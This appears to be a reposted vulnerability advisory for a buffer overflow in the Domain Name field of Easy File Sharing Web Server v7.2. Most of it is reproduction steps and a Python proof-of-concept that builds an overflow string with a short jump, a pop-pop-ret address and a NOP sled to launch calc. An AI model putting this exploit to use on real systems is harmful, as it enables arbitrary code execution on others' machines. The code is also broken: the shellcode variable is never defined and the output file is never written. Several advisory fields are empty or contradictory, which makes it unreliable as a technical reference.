Easy File Sharing WS v7.2 – (Domain Name) Buffer Overflow Exploit

A local buffer overflow vulnerability has been discovered in the official Easy File Sharing Web Server v7.2. The software vulnerability allows local attackers to overwrite the registers (exp: eip) to compromise the local software process. The issue can be exploited by local attackers with system privileges to compromise the affected local computer system. The security vulnerability is marked as classic buffer overflow issue. The vulnerability is located in the `Domain Name` input field of the active directory – add domain function.

Vulnerable Module(s):
[+] Click User Account – Active Directory

Vulnerable Function(s):
[+] Add Domain

Vulnerable Input(s):
[+] Domain Name

Product & Service Introduction:

Easy File Sharing Web Server is a file sharing software that allows visitors to upload/download files easily through a Web Browser (IE, Firefox, Chrome etc.). It can help you share files with your users, customers and partners. They can search for and download files from your computer or upload files from theirs. The files on your PC can be accessible from anywhere without special software. Easy File Sharing Web Server also provides a Bulletin Board System (Forum). It makes it easy for remote users to post messages and files to the forum. The Secure Edition adds support for SSL encryption that helps protect businesses against site spoofing and data corruption.

(Copy of the Homepage: http://www.sharing-file.com/)

Date of Discovery:


Exploitation Technique:

Local & remote

Platfom Tested:

Windows 7

Levels Risk :

Proof of Concept (PoC):

The local buffer overflow vulnerability can be exploited by local attackers with restricted system user account without user interaction.
For security demonstration or to reproduce follow the provided information and steps below to continue.

1.Download and install Easy File Sharing Web Server
2.Run the python operating script that will create a file (poc.txt)
3.Run the software « Click User Account -> Active Directory -> Add Domain -> Domain Name (Input) »
4.Paste the contents of the file (poc.txt) into the input « Domain Name » and click « OK »
5.Now the calculator executes!


from struct import pack

buffer = "\x41" * 4059
a = "\xeb\x06\x90\x90"
b = pack("<I",0x1001b8c0) #0x1001b8c0 : pop esi # pop ebp # ret
nops = "\x90" * 20

poc = buffer + a + b + nops + calc
file = open("poc.txt","w")

[+] www.vulnerability-lab.com

Soyez le premier à commenter

Poster un Commentaire

Votre adresse de messagerie ne sera pas publiée.